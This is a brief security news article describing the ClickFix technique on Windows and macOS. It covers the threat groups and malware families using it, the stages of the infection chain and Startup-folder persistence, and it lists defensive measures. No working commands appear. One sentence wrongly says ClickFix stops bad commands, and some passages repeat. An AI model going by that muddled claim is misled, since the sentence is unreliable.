New ClickFix Attack Uses Windows Run Dialog Box and macOS Terminal to Spread Malware

The ClickFix social engineering method has come back with a lot of power. It tricks people into running harmful commands that quietly put malware on their devices. The method has quickly gone from being a niche tactic to one of the most popular ways for cybercriminals to get into systems.

Cybercriminal groups and possibly state-sponsored groups like APT28 and North Korea's PurpleBravo are both using the method. The malware families used in these campaigns are MacSync, Lumma Stealer, Odyssey Stealer, and NetSupport RAT.

The ClickFix execution chain is the same on both Windows and macOS. It starts with an obfuscated input, goes through native system shell execution, pulls payloads from remote infrastructure, and ends with in-memory execution that leaves almost no trace on disk. To make malware persistent on Windows, you put a shortcut in the Startup folder.

This makes sure that the malware starts up again every time the computer is restarted. Using PowerShell Constrained Language Mode with AppLocker or Windows Defender Application Control policies will help stop scripts from running without permission. Adding new threat intelligence to SIEM and EDR platforms on a regular basis to block newly discovered staging and command-and-control domains is another important way to protect yourself.

One of the best ways to stop a manual verification prompt scam is to give targeted user awareness training that focuses on these types of scams. ClickFix stops any bad command from running before it can. Mobile device management should limit access to the terminal on macOS, and System Integrity Protection should always be on.

On both platforms, targeted user awareness training that focuses on Manual Verification Prompt scams is a good way to stop ClickFix attacks before they even start. You can find out more about ZerOwl by going to ZerOwl.com and following us on Twitter @ZerOwl_News, Facebook, and LinkedIn.